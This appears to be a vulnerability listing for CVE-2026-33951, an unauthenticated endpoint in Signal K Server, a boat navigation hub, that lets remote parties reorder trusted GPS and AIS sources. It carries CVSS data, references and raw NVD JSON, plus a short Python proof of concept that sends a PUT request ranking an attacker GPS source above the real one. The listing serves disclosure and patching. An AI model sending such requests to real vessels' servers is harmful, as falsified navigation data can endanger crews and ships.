CVE-2026-33951

Description

Signal K Server is a server application that runs on a central hub in a boat. Prior to version 2.24.0-beta.1, the SignalK Server exposes an unauthenticated HTTP endpoint that allows remote attackers to modify navigation data source priorities. This endpoint, accessible via PUT /signalk/v1/api/sourcePriorities, does not enforce authentication or authorization checks and directly assigns user-controlled input to the server configuration. As a result, attackers can influence which GPS, AIS, or other sensor data sources are trusted by the system. The changes are immediately applied and persisted to disk, allowing the manipulation to survive server restarts. This issue has been patched in version 2.24.0-beta.1.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:signalk:signal_k_server:*:*:*:*:*:*:*:* - VULNERABLE

Signal K Server < 2.24.0-beta.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-33951
import requests

target = "http://<target-ip>/signalk/v1/api/sourcePriorities"
payload = {
    "sources": [
        {"src": "attacker_gps", "priority": 1},
        {"src": "real_gps", "priority": 99}
    ]
}

# Exploit: Send unauthenticated PUT request
response = requests.put(target, json=payload)

if response.status_code == 200:
    print("[+] Successfully modified source priorities.")
else:
    print(f"[-] Failed with status code: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33951
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33951
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33951/
[4] VulDB https://vuldb.com/cve/CVE-2026-33951
[5] https://github.com/SignalK/signalk-server/releases/tag/v2.24.0-beta.1
[6] https://github.com/SignalK/signalk-server/security/advisories/GHSA-gfmv-vh34-h2x5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33951", "sourceIdentifier": "[email protected]", "published": "2026-04-02T17:16:23.200", "lastModified": "2026-04-06T15:03:50.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Signal K Server is a server application that runs on a central hub in a boat. Prior to version 2.24.0-beta.1, the SignalK Server exposes an unauthenticated HTTP endpoint that allows remote attackers to modify navigation data source priorities. This endpoint, accessible via PUT /signalk/v1/api/sourcePriorities, does not enforce authentication or authorization checks and directly assigns user-controlled input to the server configuration. As a result, attackers can influence which GPS, AIS, or other sensor data sources are trusted by the system. The changes are immediately applied and persisted to disk, allowing the manipulation to survive server restarts. This issue has been patched in version 2.24.0-beta.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:signalk:signal_k_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.24.0", "matchCriteriaId": "64F9BA25-5552-4477-84F9-83E71B2CA56F"}]}]}], "references": [{"url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0-beta.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-gfmv-vh34-h2x5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}